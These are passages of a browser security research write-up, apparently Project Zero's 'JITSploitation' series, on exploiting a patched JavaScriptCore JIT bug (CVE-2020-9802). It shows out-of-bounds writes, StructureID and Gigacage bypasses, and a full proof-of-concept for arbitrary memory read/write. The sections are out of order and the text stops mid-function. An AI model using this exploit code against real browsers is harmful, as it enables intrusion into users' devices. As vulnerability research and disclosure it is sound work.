Image: Technique to achieve memory read/write through a corrupted JSArray


At that point, the StructureID randomization is fully bypassed.

The following JavaScript code implements this, faking the object as usual by (ab)using inline properties of a “container” object:

let container = {
    jscell_header: jscell_header,
    butterfly: legit_float_arr,
};

let container_addr = addrof(container);
// add offset from container object to its inline properties
let fake_array_addr = Add(container_addr, 16);  
let fake_arr = fakeobj(fake_array_addr);

// Can now simply read a legitimate JSCell header and use it.
jscell_header = fake_arr[0];
container.jscell_header = jscell_header;

// Can read/write to memory now by corrupting the butterfly
// pointer of the float array.
fake_arr[1] = 3.54484805889626e-310;    // 0x414141414141 in hex
float_arr[0] = 1337;

This code will crash while accessing memory around 0x414141414141. As such, the attacker has now gained an arbitrary memory read/write primitive, albeit a slightly limited one:
  • Only valid double values can be read and written
  • As the Butterfly also stores its own length, it is necessary to position the butterfly pointer such that its length appears large enough to access the desired data

A Note on Exploit Stability

Running the current exploit would yield memory read/write, but would likely crash soon after when the garbage collector runs the next time and scans all reachable heap objects.

The general approach to achieve exploit stability is to keep all heap objects in a functioning state (one that will not cause the GC to crash when it scans the object and visits all outgoing pointers), or, if that is not possible, to repair them as soon as possible after corruption. In the case of this exploit, the fake_arr is initially “GC unsafe” as it contains an invalid StructureID. When its JSCell is later replaced with a valid one (container.jscell_header = jscell_header;) the faked object becomes “GC safe” as it appears like a valid JSArray to the GC.

However, there are some edge cases that can lead to corrupted data being stored in other places of the engine as well. For example, the array load in the previous JavaScript snippet (jscell_header = fake_arr[0];) will be performed by a get_by_val bytecode operation. This operation also keeps a cache of the last seen structure ID, which is used to build the value profiles relied on by the JIT compiler. This is problematic, as the structure ID of the faked JSArray is invalid and will thus lead to crashes, for example when the GC scans the bytecode caches. However, the fix is fortunately fairly easy: execute the same get_by_val op twice, the second time with a valid JSArray, whose StructureID will then be cached instead:

...
let fake_arr = fakeobj(fake_array_addr);
let legit_arr = float_arr;
let results = [];
for (let i = 0; i < 2; i++) {
    let a = i == 0 ? fake_arr : legit_arr;
    results.push(a[0]);
}
jscell_header = results[0];
...

Doing this makes the current exploit stable across GC executions.

Breaking out of the (Giga-)Cage

Note: this part is mostly a fun exercise in JIT exploitation and not strictly required for the exploit as it has already constructed a strong enough read/write primitive. However, it makes the exploit faster as the read/write gained from this is more performant and also truly arbitrary.

Somewhat contrary to the description at the beginning of this post, ArrayBuffers in JSC are actually protected by two separate mechanisms:

The Gigacage: a multi-GB virtual memory region in which the backing storage buffers of TypedArrays (and some other objects) are allocated. Instead of a 64bit pointer, the backing storage pointer is now basically a 32bit offset from the base of the cage, preventing access outside of it.

The PACCage: In addition to the Gigacage, TypedArray backing store pointers are now also protected through pointer authentication code (PAC) where available, preventing tampering with them on the heap as an attacker will generally be unable to forge a valid PAC signature. 

The exact scheme used to combine the Gigacage and the PACCage is documented for example in commit 205711404e. With that, TypedArrays are essentially doubly-protected and so evaluating whether they can still be abused for read/write seemed like a worthwhile endeavour. One place to look for potential issues is again in the JIT as it has special handling for TypedArrays to boost performance.

TypedArrays in DFG

Consider the following JavaScript code.

function opt(a) {
    return a[0];
}

let a = new Uint8Array(1024);
for (let i = 0; i < 100000; i++) opt(a);

When optimizing in DFG, the opt function would be translated to roughly the following DFG IR (with many details omitted):

CheckInBounds a, 0
v0 = GetIndexedPropertyStorage
v1 = GetByVal v0, 0
Return v1

What is interesting about this is the fact that the access to the TypedArray has been split into three different operations: a bounds check on the index, a GetIndexedPropertyStorage operation, responsible for fetching and uncaging the backing storage pointer, and a GetByVal operation which will essentially translate to a single memory load instruction. The above IR would then result in machine code looking roughly as follows, assuming that r0 held the pointer to the TypedArray a:

; bounds check omitted
Lda r2, [r0 + 24];
; Uncage and unPAC r2 here
Lda r0, [r2]
B lr

However, what would happen if no general purpose register was available for GetIndexedPropertyStorage to store the raw pointer into? In that case, the pointer would have to be spilled to the stack. This could then allow an attacker with the ability to corrupt stack memory to break out of both cages by modifying the spilled pointer on the stack before it is used to access memory by a GetByVal or SetByVal operation.

The rest of this blog post will describe how such an attack can be implemented in practice. For that, three main challenges have to be solved:
  1. Leaking a stack pointer in order to then find and corrupt spilled values on the stack
  2. Separating the GetIndexedPropertyStorage from the GetByVal operation so that code that modifies the spilled pointer can execute in between 
  3. Forcing the uncaged storage pointer to be spilled to the stack

Finding the Stack

As it turns out, finding a pointer to the stack in JSC given an arbitrary heap read/write is fairly easy: The topCallFrame member of the VM object is actually a pointer into the stack, as the JSC interpreter makes use of the native stack, and so the top JS call frame is also basically the top of the main thread’s stack. As such, finding the stack becomes as easy as following a pointer chain from the global object to the VM instance:

let global = Function('return this')();
let js_glob_obj_addr = addrof(global);

let glob_obj_addr = read64(Add(js_glob_obj_addr, 
    offsets.JS_GLOBAL_OBJ_TO_GLOBAL_OBJ));

let vm_addr = read64(Add(glob_obj_addr, offsets.GLOBAL_OBJ_TO_VM));

let vm_top_call_frame_addr = Add(vm_addr, 
    offsets.VM_TO_TOP_CALL_FRAME);
let vm_top_call_frame_addr_dbl = vm_top_call_frame_addr.asDouble();

let stack_ptr = read64(vm_top_call_frame_addr);
log(`[*] Top CallFrame (stack) @ ${stack_ptr}`);

Separating TypedArray Access Operations

With the opt function above that simply accesses a typed array at an index once (i.e. a[0]), the GetIndexedPropertyStorage operation will be directly followed by the GetByVal operation, thus making it impossible to corrupt the uncaged pointer even if it was spilled onto the stack. However, the following code already manages to separate the two operations:

function opt(a) {
    a[0];

    // Spill code here

    a[1];
}

This code will initially generate the following DFG IR:

v0 = GetIndexedPropertyStorage a 
GetByVal v0, 0

// Spill code here

v1 = GetIndexedPropertyStorage a
GetByVal v1, 1

Then, a bit later in the optimization pipeline, the two GetIndexedPropertyStorage operations will be CSE’d into a single one, thus separating the 2nd GetByVal from the GetIndexedPropertyStorage operation:

v0 = GetIndexedPropertyStorage a
GetByVal v0, 0

// Spill code here

// Then walk over stack here and replace backing storage pointer

GetByVal v0, 1

However, this will only happen if the spilling code doesn’t modify global state, because that could potentially detach the TypedArray’s buffer, thus invalidating its backing storage pointer. In that case, the compiler would be forced to reload the backing storage pointer for the 2nd GetByVal. As such, it’s not possible to run completely arbitrary code to force spilling, but that is not a problem as is shown next. It is also worth noting that two different indices must be used here since otherwise the GetByVals could be CSE’d as well.

Spilling Registers

With the previous two steps done, the remaining question is how to force spilling of the uncaged pointer produced by GetIndexedPropertyStorage. One way to force spilling while still allowing the CSE to happen is by performing some simple mathematical computations that require a lot of temporary values to be kept alive. The following code accomplishes this in a stylish way:

let p = 0; // Placeholder, needed for the ascii art =)

let r0=i,r1=r0,r2=r1+r0,r3=r2+r1,r4=r3+r0,r5=r4+r3,r6=r5+r2,r7=r6+r1,r8=r7+r0;
let r9=            r8+   r7,r10=r9+r6,r11=r10+r5,   r12   =r11+p      +r4+p+p;
let r13   =r12+p   +r3,   r14=r13+r2,r15=r14+r1,   r16=   r15+p   +   r0+p+p+p;
let r17   =r16+p   +r15,   r18=r17+r15,r19=r18+   r14+p   ,r20   =p   +r19+r13;
let r21   =r19+p   +r12 ,   r22=p+      r21+p+   r11+p,   r23   =p+   r22+r10;
let r24            =r23+r9   ,r25   =p   +r24   +r8+p+p   +p   ,r26   =r25+r7;
let r27   =r26+r6,r28=r27+p   +p   +r5+   p,   r29=r28+   p    +r4+   p+p+p+p;
let r30   =r29+r3,r31=r30+r2      ,r32=p      +r31+r1+p      ,r33=p   +r32+r0;
let r34=r33+r32,r35=r34+r31,r36=r25+r30,r37=r36+r29,r38=r37+r28,r39=r38+r27+p;

let r = r39; // Keep the entire computation alive, or nothing will be spilled.

The computed series is somewhat similar to the fibonacci series, but requires that intermediate results are kept alive as they are needed again later on in the series. Unfortunately, this approach is somewhat fragile as unrelated changes to various parts of the engine, in particular the register allocator, will easily break the stack spilling. 

There is another, simpler way (although probably slightly less performant and certainly less visually appealing) that virtually guarantees that a raw storage pointer will be spilled to the stack: simply access as many TypedArrays as there are general purpose registers instead of just one. In that case, as there are not enough registers to hold all the raw backing storage pointers, some of them will have to be spilled to the stack where they can then be found and replaced. A naive version of this would look as follows:

typed_array1[0];
typed_array2[0];
...;
typed_arrayN[0];

// Walk over stack, find and replace spilled backing storage pointer
let stack = ...;   // JSArray pointing into stack
for (let i = 0; i < 512; i++) {
    if (stack[i] == old_ptr) {
        stack[i] = new_ptr;
        break;
    }
}

typed_array1[0] = val_to_write;
typed_array2[0] = val_to_write;
...;
typed_arrayN[0] = val_to_write;

With the main challenges overcome, the attack can now be implemented and a proof-of-concept is attached at the end of this blog post for the interested reader. All in all the technique is quite fiddly to implement initially, with a few more gotchas that have to be taken care of - see the PoC for details. However, once implemented, the resulting code is highly reliable and very fast, almost instantly achieving a truly arbitrary memory read/write primitive on both macOS and iOS and across different WebKit builds without additional changes.

Conclusion

This post showed how an attacker can (still) exploit the well-known addrof and fakeobj primitives to gain arbitrary memory read/write in WebKit. For that the StructureID mitigation had to be bypassed, while bypassing the Gigacage was mostly optional (but fun). I would personally draw the following conclusions from writing the exploit up to this point:

  1. StructureID randomization seems very weak at this point. As a fair amount of type information is stored in the JSCell bits and thus predictable by the attacker, it seems likely that many other operations can be found and abused that don’t require a valid StructureID. Furthermore, bugs that can be turned into heap out-of-bounds reads can likely be used to leak a valid StructureID.
  2. In its current state, the purpose of the Gigacage as a security mitigation is not entirely clear to me, as an (almost) arbitrary read/write primitive can be constructed from plain JSArrays which are not subject to the Gigacage. At that point, as demonstrated here, the Gigacage can also be fully bypassed, even though that is likely not necessary in practice.
  3. I think it would be worth investigating the impact (both on security and performance) of removing unboxed double JSArrays and properly caging the remaining JSArray types (which all store “boxed” JSValues). This could potentially make both the StructureID randomization and the Gigacage much stronger. In the case of this exploit, this would have prevented the construction of the addrof and fakeobj primitives in the first place (because the double <-> JSValue type confusion could no longer be constructed) as well as the limited read/write through JSArrays and would also prevent leaking a valid StructureID via an OOB access into a JSArray (arguably the most common scenario for OOB accesses).

The final part of this series will show how PC control can be gained from the read/write despite more mitigations such as PAC and APRR.

Proof-of-Concept GigaUnCager

// This function achieves arbitrary memory read/write by abusing TypedArrays.
//
// In JSC, the typed array backing storage pointers are caged as well as PAC
// signed. As such, modifying them in memory will either just lead to a crash
// or only yield access to the primitive Gigacage region which isn't very useful.
//
// This function bypasses that when one already has a limited read/write primitive:
// 1. Leak a stack pointer
// 2. Access NUM_REGS+1 typed array so that their uncaged and PAC authenticated backing
//    storage pointer are loaded into registers via GetIndexedPropertyStorage.
//    As there are more of these pointers than registers, some of the raw pointers
//    will be spilled to the stack.
// 3. Find and modify one of the spilled pointers on the stack
// 4. Perform a second access to every typed array which will now load and
//    use the previously spilled (and now corrupted) pointers.
//
// It is also possible to implement this using a single typed array and separate
// code to force spilling of the backing storage pointer to the stack. However,
// this way it is guaranteed that at least one pointer will be spilled to the
// stack regardless of how the register allocator works as long as there are
// more typed arrays than registers.
//
// NOTE: This function is only a template, in the final function, every
// line containing an "$r" will be duplicated NUM_REGS times, with $r
// replaced with an incrementing number starting from zero.
//
const READ = 0, WRITE = 1;
let memhax_template = function memhax(memviews, operation, address, buffer, length, stack, needle) {
    // See below for the source of these preconditions.
    if (length > memviews[0].length) {
        throw "Memory access too large";
    } else if (memviews.length % 2 !== 1) {
        throw "Need an odd number of TypedArrays";
    }

    // Save old backing storage pointer to restore it afterwards.
    // Otherwise, GC might end up treating the stack as a MarkedBlock.
    let savedPtr = controller[1];

    // Function to get a pointer into the stack, below the current frame.
    // This works by creating a new CallFrame (through a native funcion), which
    // will be just below the CallFrame for the caller function in the stack,
    // then reading VM.topCallFrame which will be a pointer to that CallFrame:
    // https://github.com/WebKit/webkit/blob/e86028b7dfe764ab22b460d150720b00207f9714/
    // Source/JavaScriptCore/runtime/VM.h#L652)
    function getsp() {
        function helper() {
            // This code currently assumes that whatever precedes topCallFrame in
            // memory is non-zero. This seems to be true on all tested platforms.
            controller[1] = vm_top_call_frame_addr_dbl;
            return memarr[0];
        }
        // DFGByteCodeParser won't inline Math.max with more than 3 arguments
        // https://github.com/WebKit/webkit/blob/e86028b7dfe764ab22b460d150720b00207f9714/
        // Source/JavaScriptCore/dfg/DFGByteCodeParser.cpp#L2244
        // As such, this will force a new CallFrame to be created.
        let sp = Math.max({valueOf: helper}, -1, -2, -3);
        return Int64.fromDouble(sp);
    }

    let sp = getsp();

    // Set the butterfly of the |stack| array to point to the bottom of the current
    // CallFrame, thus allowing us to read/write stack data through it. Our current
    // read/write only works if the value before what butterfly points to is nonzero.
    // As such, we might have to try multiple stack values until we find one that works.
    let tries = 0;
    let stackbase = new Int64(sp);
    let diff = new Int64(8);
    do {
        stackbase.assignAdd(stackbase, diff);
        tries++;
        controller[1] = stackbase.asDouble();
    } while (stack.length < 512 && tries < 64);

    // Load numregs+1 typed arrays into local variables.
    let m$r = memviews[$r];

    // Load, uncage, and untag all array storage pointers.
    // Since we have more than numreg typed arrays, at least one of the
    // raw storage pointers will be spilled to the stack where we'll then
    // corrupt it afterwards.
    m$r[0] = 0;

    // After this point and before the next access to memview we must not
    // have any DFG operations that write Misc (and as such World), i.e could
    // cause a typed array to be detached. Otherwise, the 2nd memview access
    // will reload the backing storage pointer from the typed array.

    // Search for correct offset.
    // One (unlikely) way this function could fail is if the compiler decides
    // to relocate this loop above or below the first/last typed array access.
    // This could easily be prevented by creating artificial data dependencies
    // between the typed array accesses and the loop.
    //
    // If we wanted, we could also cache the offset after we found it once.
    let success = false;
    // stack.length can be a negative number here so fix that with a bitwise and.
    for (let i = 0; i < Math.min(stack.length & 0x7fffffff, 512); i++) {
        // The multiplication below serves two purposes:
        //
        // 1. The GetByVal must have mode "SaneChain" so that it doesn't bail
        //    out when encountering a hole (spilled JSValues on the stack often
        //    look like NaNs): https://github.com/WebKit/webkit/blob/
        //    e86028b7dfe764ab22b460d150720b00207f9714/Source/JavaScriptCore/
        //    dfg/DFGFixupPhase.cpp#L949
        //    Doing a multiplication achieves that: https://github.com/WebKit/
        //    webkit/blob/e86028b7dfe764ab22b460d150720b00207f9714/Source/
        //    JavaScriptCore/dfg/DFGBackwardsPropagationPhase.cpp#L368
        //
        // 2. We don't want |needle| to be the exact memory value. Otherwise,
        //    the JIT code might spill the needle value to the stack as well,
        //    potentially causing this code to find and replace the spilled needle
        //    value instead of the actual buffer address.
        //
        if (stack[i] * 2 === needle) {
            stack[i] = address;
            success = i;
            break;
        }
    }

    // Finally, arbitrary read/write here :)
    if (operation === READ) {
        for (let i = 0; i < length; i++) {
            buffer[i] = 0;
            // We assume an odd number of typed arrays total, so we'll do one
            // read from the corrupted address and an even number of reads
            // from the inout buffer. Thus, XOR gives us the right value.
            // We could also zero out the inout buffer before instead, but
            // this seems nicer :)
            buffer[i] ^= m$r[i];
        }
    } else if (operation === WRITE) {
        for (let i = 0; i < length; i++) {
            m$r[i] = buffer[i];
        }
    }

    // For debugging: can fetch SP here again to verify we didn't bail out in between.
    //let end_sp = getsp();

    controller[1] = savedPtr;

    return {success, sp, stackbase};
}

// Add one to the number of registers so that:
// - it's guaranteed that there are more values than registers (note this is
//   overly conservative, we'd surely get away with less)
// - we have an odd number so the XORing logic for READ works correctly
let nregs = NUM_REGS + 1;

// Build the real function from the template :>
// This simply duplicates every line containing the marker nregs times.
let source = [];
let template = memhax_template.toString();
for (let line of template.split('\n')) {
    if (line.includes('$r')) {
        for (let reg = 0; reg < nregs; reg++) {
            source.push(line.replace(/\$r/g, reg.toString()));
        }
    } else {
        source.push(line);
    }
}
source = source.join('\n');
let memhax = eval((${source}));
//log(memhax);

// On PAC-capable devices, the backing storage pointer will have a PAC in the
// top bits which will be removed by GetIndexedPropertyStorage. As such, we are
// looking for the non-PAC'd address, thus the bitwise AND.
if (IS_IOS) {
    buf_addr.assignAnd(buf_addr, new Int64('0x0000007fffffffff'));
}
// Also, we don't search for the address itself but instead transform it slightly.
// Otherwise, it could happen that the needle value is spilled onto the stack
// as well, thus causing the function to corrupt the needle value.
let needle = buf_addr.asDouble() * 2;

log(`[*] Constructing arbitrary read/write by abusing TypedArray @ ${buf_addr}`);

// Buffer to hold input/output data for memhax.
let inout = new Int32Array(0x1000);

// This will be the memarr after training.
let dummy_stack = [1.1, buf_addr.asDouble(), 2.2];

let views = new Array(nregs).fill(view);

let lastSp = 0;
let spChanges = 0;
for (let i = 0; i < ITERATIONS; i++) {
    let out = memhax(views, READ, 13.37, inout, 4, dummy_stack, needle);
    out = memhax(views, WRITE, 13.37, inout, 4, dummy_stack, needle);
    if (out.sp.asDouble() != lastSp) {
        lastSp = out.sp.asDouble();
        spChanges += 1;
        // It seems we'll see 5 different SP values until the function is FTL compiled
        if (spChanges == 5) {
            break;
        }
    }
}

// Now use the real memarr to access stack memory.
let stack = memarr;

// An address that's safe to clobber
let scratch_addr = Add(buf_addr, 42*4);

// Value to write
inout[0] = 0x1337;

for (let i = 0; i < 10; i++) {
    view[42] = 0;

    let out = memhax(views, WRITE, scratch_addr.asDouble(), inout, 1, stack, needle);

    if (view[42] != 0x1337) {
        throw "failed to obtain reliable read/write primitive";
    }
}

log([+] Got stable arbitrary memory read/write!);
if (DEBUG) {
    log("[*] Verifying exploit stability...");
    gc();
    log("[*] All stable!");
}

✇Google Project Zero

JITSploitation I: A JIT Bug

By: Tim
By Samuel Groß, Project Zero

This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

==========

How might a browser renderer exploit look like in 2020? I set out to answer that question in January this year. Since it’s one of my favorite areas in computer science, I wanted to find a JIT compiler vulnerability, and I was especially interested in trying to find (new) types of vulnerabilities that my fuzzer would have a hard time finding.

As WebKit (on iOS and likely soon on ARM-powered macOS) arguably features the most sophisticated exploit mitigations at present, including hardware supported mitigations like PAC and APRR, it seemed fitting to focus on WebKit, or in fact JavaScriptCore (JSC), its JavaScript engine.

This blog post series will:
  • Provide a short introduction to JIT engines and in particular the Common-Subexpression Elimination (CSE) optimization
  • Explain a JIT compiler vulnerability - CVE-2020-9802 - stemming from incorrect CSE and how it can be exploited for an out-of-bounds read or write on the JSC heap
  • Provide an in depth discussion of WebKit’s renderer exploit mitigations on iOS, in particular: StructureID randomization, the Gigacage, Pointer Authentication (PAC) and JIT Hardening on top of APRR (essentially per-thread page permissions), how they work, potential weaknesses, and how they were bypassed during exploit development

The proof of concept exploit code accompanying this blog post series can be found here. It was tested against Mobile Safari on iOS 13.4.1 and Safari 13.1 on macOS 10.15.4.

This series strives to be understandable for security researchers and engineers without strong backgrounds in browser exploitation. It also attempts to explain the various JIT compilation mechanisms used (and abused) for exploit development. However, it should be noted that JIT compilers are likely among the most complex attack surfaces of a web browser (and that the exploited vulnerability is likely particularly complex), and are thus not particularly beginner friendly. On the other hand, the vulnerabilities found therein are also frequently among the most powerful ones, with a good chance to stay exploitable for quite some time to come.

Introduction

As there are by now many good public resources on JIT compilers, this section only provides a brief 2 minute introduction/refresher to JavaScript JITing.

Take the following JavaScript code:

function foo(o, y) {
    let x = o.x;
    return x + y;
}

for (let i = 0; i < 10000; i++) {
    foo({x: i}, 42);
}

As JIT compilation is costly, it is only performed for code that is repeatedly executed. As such, the function foo will execute inside the interpreter (or a cheap “baseline” JIT) for some time. During that time, value profiles will be collected, which, for foo, would look something like this:

  • o: JSObject with a property .x at offset 16
  • x: Int32
  • y: Int32

Later, when the optimizing JIT compiler eventually kicks in, it starts by translating the JavaScript source code (or, more likely the interpreter bytecode) into the JIT compiler’s own intermediate code representation. In the DFG, JavaScriptCore’s optimizing JIT compiler, this is done by the DFGByteCodeParser.

The function foo in DFG IR might initially look something like this:

v0 = GetById o, .x
v1 = ValueAdd v0, y
Return v1

Here, GetById and ValueAdd are fairly generic (or high-level) operations, capable of handling different input types (e.g. ValueAdd would also be able to concatenate strings).

Next, the JIT compiler inspects the value profiles and, based on them, will speculate that similar input types will be used in the future. Here, it would speculate that o would always be a certain kind of JSObject and x and y Int32s. However, as there is no guarantee the speculations will always be true, the compiler has to guard the speculations, typically with cheap runtime type checks:

CheckType o, “Object with property .x at offset 16”
CheckType y, Int32
v0 = GetByOffset o, 16
CheckType v0, Int32
v1 = ArithAdd v0, y
Return v1

Also note how the GetById and ValueAdd have been specialized to the more efficient (and less generic) GetByOffset and ArithAdd operations. In DFG, this speculative optimization happens in multiple places, for example, already in DFGByteCodeParser.

At this point, the IR code is essentially typed as the speculation guards allow type inference. Next, numerous code optimizations are performed, such as loop-invariant code motion or constant folding. An overview of the optimizations done by DFG can be extracted from DFGPlan.

Finally, the now-optimized IR is lowered to machine code. In DFG this is done directly by the DFGSpeculativeJIT while in FTL mode the DFG IR is first lowered to B3, another IR, which undergoes further optimizations before itself being lowered to machine code.

Next up, a specific optimization Common-Subexpression Elimination (CSE) is discussed.

Common-Subexpression Elimination (CSE)

The idea behind this optimization is to detect duplicate computations (or expressions) and to merge them into a single computation. As an example, consider the following JavaScript code:

    let c = Math.sqrt(a*a + a*a);

Assume further that a and b are known to be primitive values (e.g. Numbers), then a JavaScript JIT compiler can convert the code to the following:

   let tmp = a*a;
   let c = Math.sqrt(tmp + tmp);

And by doing so save one ArithMul operation at runtime. This optimization is called Common Subexpression Elimination (CSE).

Now, take the following JavaScript code instead:

   let c = o.a;
   f();
   let d = o.a;

Here, the compiler can not eliminate the second property load operation during CSE as the function call in between could have changed the value of the .a property.

In JSC, the modelling of whether an operation can be subject to CSE (and under which circumstances) is done in DFGClobberize. For ArithMul, DFGClobberize states:

    case ArithMul:
        switch (node->binaryUseKind()) {
        case Int32Use:
        case Int52RepUse:
        case DoubleRepUse:
            def(PureValue(node, node->arithMode()));
            return;
        case UntypedUse:
            clobberTop();
            return;
        default:
            DFG_CRASH(graph, node, "Bad use kind");
        }

The def() of the PureValue here expresses that the computation does not rely on any context and thus that it will always yield the same result when given the same inputs. However, note that the PureValue is parameterized by the ArithMode of the operation, which specifies whether the operation should handle (e.g. by bailing out to the interpreter) integer overflows or not. The parameterization in this case prevents two ArithMul operations with different handling of integer overflows from being substituted for each other. An operation that handles overflows is also commonly referred to as a “checked” operation, and an “unchecked” operation is one that does not detect or handle overflows.

In contrast, for GetByOffset (which can be used for the property load), DFGClobberize contains:

   case GetByOffset:
       unsigned identifierNumber = node->storageAccessData().identifierNumber;
       AbstractHeap heap(NamedProperties, identifierNumber);
       read(heap);
       def(HeapLocation(NamedPropertyLoc, heap, node->child2()), LazyNode(node));

This in essence says that the value produced by this operation depends on the NamedProperty "abstract heap". As such, eliminating a second GetByOffset is only sound if there are no writes to the NamedProperties abstract heap (i.e. to memory locations containing property values) between the two GetByOffset operations.

The Bug


    case ArithNegate:
        if (node->child1().useKind() == Int32Use || ...)
            def(PureValue(node));          // <- only the input matters, not the ArithMode

This could cause CSE to substitute a checked ArithNegate with an unchecked one. In the case of ArithNegate (a negation of a 32bit integer), an integer overflow can only occur in one specific situation: when negating INT_MIN: -2147483648. This is because 2147483648 is not representable as a 32 bit signed integer, and so -INT_MIN causes an integer overflow and again results in INT_MIN.

The bug was found by studying the CSE defs in DFGClobberize, thinking about why some PureValues (and which ones) needed to be parameterized with the ArithMode, then searching for cases where that parameterization was missing. 

The patch for this bug is very simple:

-            def(PureValue(node));
+            def(PureValue(node, node->arithMode()));

This now teaches CSE to take the arithMode (unchecked or checked) of an ArithNegate operation into account. As such, two ArithNegate operations with different modes can no longer be substituted for each other.

In addition to ArithNegate, DFGClobberize also missed the ArithMode for the ArithAbs operation.

Note that this type of bug is likely very hard to detect through fuzzing as 
  • the fuzzer would need to create two ArithNegate operations on the same inputs but with a different ArithMode,
  • the fuzzer would need to trigger the case where the difference in the ArithMode matters, which in this case means it would need to negate the value INT_MIN, and,
  • unless the engine has custom “sanitizers” for detecting these types of issues early on and unless differential fuzzing is done, the fuzzer would then somehow still need to turn this condition into a memory safety violation or an assertion failure. As is shown in the next section, this step is likely the hardest and extremely unlikely to happen by chance

Achieving Out-Of-Bounds

The JavaScript function shown below achieves out-of-bounds access by an arbitrary index (in this case 7) into a JSArray through this bug:

function hax(arr, n) {
    n |= 0;
    if (n < 0) {
        let v = (-n)|0;
        let i = Math.abs(n);
        if (i < arr.length) {
            if (i & 0x80000000) {
                i += -0x7ffffff9;
            }
            if (i > 0) {
                arr[i] = 1.04380972981885e-310;
            }
        }
    }

The following is a step-by-step explanation of how this PoC was constructed. At the end of this section there is also a commented version of the above function.

First of all, ArithNegate is only used to negate integers (the more generic ValueNegate operation can negate all JavaScript values), but in the JavaScript specification Numbers are generally floating point values. As such it is necessary to “hint” to the compiler that the input value will always be integer. This is easily accomplished by first performing a bitwise operation, which will always result in 32-bit signed integer values:

    n = n|0; // n will be an integer value now

With that, it is now possible to construct an unchecked ArithNegate operation (with which a checked one will later be CSE’d):

    n = n|0;
    let v = (-n)|0;

Here, during the DFGFixupPhase, the negation of n will be converted to an unchecked ArithNeg operation. The compiler is able to omit the overflow check as the only use of the negated value is the bitwise or, and that behaves the same for the overflowed and “correct” value:  

js> -2147483648 | 0
-2147483648
js> 2147483648 | 0
-2147483648

Next, it is necessary to construct a checked ArithNegate operation with n as its input. One interesting (why will become clear in a bit) way to obtain an ArithNegate is by having the compiler strength-reduce an ArithAbs operation into an ArithNegate operation. This will only happen if the compiler can prove that n will be a negative number, which can easily be accomplished as DFG’s IntegerRangeOptimization pass is path-sensitive:

n = n|0;
if (n < 0) {
    // Compiler knows that n will be a negative integer here

    let v = (-n)|0;
    let i = Math.abs(n);
}

Here, during bytecode parsing, the call to Math.abs will first be lowered to an ArithAbs operation because the compiler is able to prove that the call will always result in the execution of the mathAbs function and so replaces it with the ArithAbs operation, which has the same runtime semantics but doesn’t require a function call at runtime. The compiler is in essence inlining Math.abs that way. Later, the IntegerRangeOptimization will convert the ArithAbs to a checked ArithNegate (the ArithNegate must be checked as INT_MIN can’t be ruled out for n). As such, the two statements inside the if statement become essentially (in pseudo DFG IR):

v = ArithNeg(unchecked) n
i = ArithNeg(checked) n

Which, due to the bug, CSE will later turn into

v = ArithNeg(unchecked) n
i = v

At this point, calling the miscompiled function with INT_MIN for n will cause i to also be INT_MIN, even though it really should be a positive number. 

This by itself is a correctness issue, but not yet a security issue. One (and possibly the only) way to turn this bug into a security issue is by abusing a JIT optimization already popular among security researchers: bounds-check elimination. 

Going back to the IntegerRangeOptimization pass, the value of i was already marked as being a positive number. For bounds check elimination to happen, however, the value must also be known to be less than the length of the array being indexed. This is easily accomplished:

function hax(arr, n) {
  n = n|0;
  if (n < 0) {
    let v = (-n)|0;
    let i = Math.abs(n);
    if (i < arr.length) {
        arr[i];
    }
  }
}

When now triggering the bug, i will be INT_MIN and will thus pass the comparison and perform the array access. However, the bounds check will have been removed as IntegerRangeOptimization has falsely (although it’s technically not its fault) determined i to always be in bounds.

Before the bug can be triggered, the JavaScript code has to be JIT compiled. This is generally achieved simply by executing the code a large number of times. However, the indexed access into arr will only be lowered (by the SSALoweringPhase) to a CheckInBounds (that will later be removed) and an un-bounds-checked GetByVal if the access is speculated to be in bounds. This will not be the case if the access has frequently been observed to be out-of-bounds during interpretation or execution in baseline JIT. As such, during “training” of the function it is necessary to use sane, in-bounds indices:

    for (let i = 1; i <= ITERATIONS; i++) {
        let n = -4;
        if (i == ITERATIONS) {
            n = -2147483648;        // INT_MIN
        }
        hax(arr, n);
    }

Running this code inside JSC will crash:

lldb -- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc poc.js
   (lldb) r
   Process 12237 stopped
   * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1c1fc61348)
       frame #0: 0x000051fcfaa06f2e
   ->  0x51fcfaa06f2e: movsd  xmm0, qword ptr [rax + 8*rcx] ; xmm0 = mem[0],zero
   Target 0: (jsc) stopped.
   (lldb) reg read rcx
        rcx = 0x0000000080000000

However, inconveniently, the out-of-bounds index (in rcx) will always be INT_MIN, thus accessing 0x80000000 * 8 = 16GB behind the array. While probably exploitable, it’s not exactly the best exploit primitive to start from.

The final trick to achieve an OOB access with an arbitrary index is to subtract a constant from i which will wrap INT_MIN around to an arbitrary, positive number. As i is thought (by the DFG compiler) to always be positive, the subtraction will become unchecked and the overflow will thus go unnoticed.

However, as the subtraction invalidates integer range information about the lower bound, an additional `if i > 0` check is required afterwards to again trigger bounds check removal. Also, as the subtraction would turn the integers used during training into out-of-bounds indices, it is only executed conditionally if the input value is negative. Fortunately, the DFG compiler isn’t (yet) clever enough to determine that that condition should never be true in which case it could just optimize away the subtraction entirely :)

With all of that, shown below is again the function from the start, however this time with comments. When JITed and given INT_MIN for n it causes an out-of-bounds write of a controlled value (0x0000133700001337) into the length fields of a JSArray directly following arr in memory. Note that the success of this step depends on the correct heap layout. However, as the bug is powerful enough to be exploited for a controlled OOB read as well, it is possible to ensure the correct heap layout is present before triggering the memory corruption.

function hax(arr, n) {
    // Force n to be a 32bit integer.
    n |= 0;

    // Let IntegerRangeOptimization know that 
    // n will be a negative number inside the body.
    if (n < 0) {
        // Force "non-number bytecode usage" so the negation 
        // becomes unchecked and as such INT_MIN will again
        // become INT_MIN in the last iteration.
        let v = (-n)|0;

        // As n is known to be negative here, this ArithAbs 
        // will become a ArithNegate. That negation will be 
        // checked, but then be CSE'd for the previous, 
        // unchecked one. This is the compiler bug.
        let i = Math.abs(n);

        // However, IntegerRangeOptimization has also marked 
        // i as being >= 0...

        if (i < arr.length) {
            // .. so here IntegerRangeOptimization now believes 
            // i will be in the range [0, arr.length) while i 
            // will actually be INT_MIN in the final iteration.

            // This condition is written this way so integer 
            // range optimization isn't able to propagate range 
            // information (in particular that i must be a 
            // negative integer) into the body.
            if (i & 0x80000000) {
